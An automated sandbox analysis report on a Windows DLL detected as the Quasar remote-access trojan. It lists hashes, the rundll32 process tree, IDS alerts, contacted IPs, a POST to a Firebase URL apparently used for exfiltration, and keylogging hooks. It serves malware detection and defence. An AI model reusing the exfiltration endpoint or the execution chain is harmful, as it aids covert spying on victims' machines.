
Windows Analysis Report
vstdlib_s64.dll.dll

Overview

General Information

Sample name: vstdlib_s64.dll.dll (renamed because original name is a hash value)
Original sample name: vstdlib_s64.dll.exe
Analysis ID: 1473780
MD5: ac7da10e20d625cc463536172d0ac33e
SHA1: c4242194e3faa82506513e2572c160a30082bfb0
SHA256: 6799f1948048b91991392b421ccc6b30be415cda26deb71baeecb33b41b12959
Tags: Blotchy, Quasar, exe, RAT

Detection

Quasar
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Quasar RAT
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • loaddll64.exe (PID: 3228 cmdline: loaddll64.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 2784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1508 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 5824 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6220 cmdline: rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6956 cmdline: rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5052 cmdline: rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePath MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2500 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 3748 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6864 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePath MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1516 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintf MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1612 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpy MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6724 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_length MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6916 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6912 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintf MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1196 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2840 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4488 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlash MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2536 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDir MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 3340 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashes MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
Name: Quasar RAT, QuasarRAT
Description: Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
Attribution:
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
No configs have been found
Source | Rule | Description | Author | Strings
vstdlib_s64.dll.dll | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
No Sigma rule has matched

Timestamp: 07/15/24-21:07:19.513418
SID: 2814031
Source Port: 49738
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 07/15/24-21:07:19.945864
SID: 2814030
Source Port: 49739
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: vstdlib_s64.dll.dll ReversingLabs: Detection: 26%
Source: Yara match File source: vstdlib_s64.dll.dll, type: SAMPLE
Source: vstdlib_s64.dll.dll Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 34.120.206.254:443 -> 192.168.2.4:49735 version: TLS 1.0
Source: unknown HTTPS traffic detected: 88.198.193.213:443 -> 192.168.2.4:49740 version: TLS 1.0
Source: vstdlib_s64.dll.dll Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Traffic Snort IDS: 2814031 ETPRO TROJAN W32/Quasar RAT Connectivity Check 192.168.2.4:49738 -> 88.198.193.213:80
Source: Traffic Snort IDS: 2814030 ETPRO TROJAN W32/Quasar RAT Connectivity Check 2 192.168.2.4:49739 -> 3.33.130.190:80
Source: C:\Windows\System32\rundll32.exe Network Connect: 104.26.12.205 80
Source: C:\Windows\System32\rundll32.exe Network Connect: 88.198.193.213 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 3.33.130.190 80
Source: C:\Windows\System32\rundll32.exe Network Connect: 34.120.206.254 443
Source: global traffic HTTP traffic detected: POST /user.json HTTP/1.1
  Content-Type: application/json; charset=utf-8
  Host: argentina-e4162-default-rtdb.firebaseio.com
  Content-Length: 76
  Expect: 100-continue
  Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 104.26.12.205
Source: Joe Sandbox View IP Address: 88.198.193.213
Source: Joe Sandbox View IP Address: 3.33.130.190
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: HETZNER-ASDE
Source: Joe Sandbox View ASN Name: AMAZONEXPANSIONGB
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown DNS query: name: freegeoip.net
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: global traffic HTTP traffic detected: GET /geoip HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
  Host: www.telize.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /geoip HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
  Host: www.telize.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /geoip HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
  Host: telize.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
  Host: freegeoip.net
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
  Host: api.ipify.org
  Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: argentina-e4162-default-rtdb.firebaseio.com
Source: global traffic DNS traffic detected: DNS query: telize.com
Source: global traffic DNS traffic detected: DNS query: www.telize.com
Source: global traffic DNS traffic detected: DNS query: freegeoip.net
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: unknown HTTP traffic detected: POST /user.json HTTP/1.1
  Content-Type: application/json; charset=utf-8
  Host: argentina-e4162-default-rtdb.firebaseio.com
  Content-Length: 76
  Expect: 100-continue
  Connection: Keep-Alive
Source: rundll32.exe, rundll32.exe, 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: http://api.ipify.org/
Source: rundll32.exe, rundll32.exe, 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: http://freegeoip.net/xml/
Source: rundll32.exe, rundll32.exe, 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: http://telize.com/geoip
Source: rundll32.exe, rundll32.exe, 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://argentina-e4162-default-rtdb.firebaseio.com/user.json
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: vstdlib_s64.dll.dll, oqBXyy.cs .Net Code: Instal_Key_Capt
Source: vstdlib_s64.dll.dll, pblsOey.cs .Net Code: hook

E-Banking Fraud

Source: Yara match File source: vstdlib_s64.dll.dll, type: SAMPLE
                        Source: Yara matchFile source: 00000003.00000002.1703302239.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1805367986.0000021A9FE12000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1703297864.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1806920256.0000021EF74E2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1804504731.000001D6442D2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.3557919127.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1730594231.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1803990209.0000020FEDBB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1806280015.000002113B832000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1812533280.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1805248245.000001DA7ABE2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1815867810.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1804903406.000001EDD23B2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1805370892.000002B1ACFD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6220, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6956, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5052, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2500, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3748, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6864, type: MEMORYSTR
                        Source: C:\Windows\System32\rundll32.exe; File created: C:\Windows\system32\Data.log
                        Source: vstdlib_s64.dll.dll; Static PE information: invalid certificate
                        Source: vstdlib_s64.dll.dll, jnrUhiH.cs; Base64 encoded string: [string elided]
                        Source: classification engine; Classification label: mal80.troj.spyw.evad.winDLL@38/2@5/4
                        Source: C:\Windows\System32\rundll32.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rundll32.exe.log
                        Source: C:\Windows\System32\rundll32.exe; Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2784:120:WilError_03
                        Source: C:\Windows\System32\rundll32.exe; Mutant created: \Sessions\1\BaseNamedObjects\e4d6a6ec-320d-48ee-b6b2-fa24f03760d4
                        Source: vstdlib_s64.dll.dll; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: vstdlib_s64.dll.dll; Static file information: TRID: Win64 Dynamic Link Library (generic) Net Framework (111504/3) 44.42%
                        Source: C:\Windows\System32\loaddll64.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes
                        Source: vstdlib_s64.dll.dll; ReversingLabs: Detection: 26%
                        Source: unknown; Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll"
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes
                        Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePath
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashes
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashes
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePath
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintf
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpy
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_length
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintf
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlash
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDir
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashes
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePath
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashes
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashes
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePath
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintf
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpy
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_length
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintf
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlash
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDir
                        Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashes
                        Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                        Source: C:\Windows\System32\loaddll64.exe; Section loaded: apphelp.dll
                        Source: C:\Windows\System32\loaddll64.exe; Section loaded: mscoree.dll
                        Source: C:\Windows\System32\loaddll64.exe; Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\loaddll64.exe; Section loaded: version.dll
                        Source: C:\Windows\System32\loaddll64.exe; Section loaded: kernel.appcore.dll
                        Source: Window Recorder; Window detected: More than 3 window changes detected
                        Source: vstdlib_s64.dll.dll; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: vstdlib_s64.dll.dll; Static PE information: Virtual size of .text is bigger than: 0x100000
                        Source: vstdlib_s64.dll.dll; Static PE information: Image base 0x180000000 > 0x60000000
                        Source: vstdlib_s64.dll.dll; Static file information: File size 7477096 > 1048576
                        Source: vstdlib_s64.dll.dll; Static PE information: Raw size of .text is bigger than: 0x100000 < 0x71de00
                        Source: vstdlib_s64.dll.dll; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
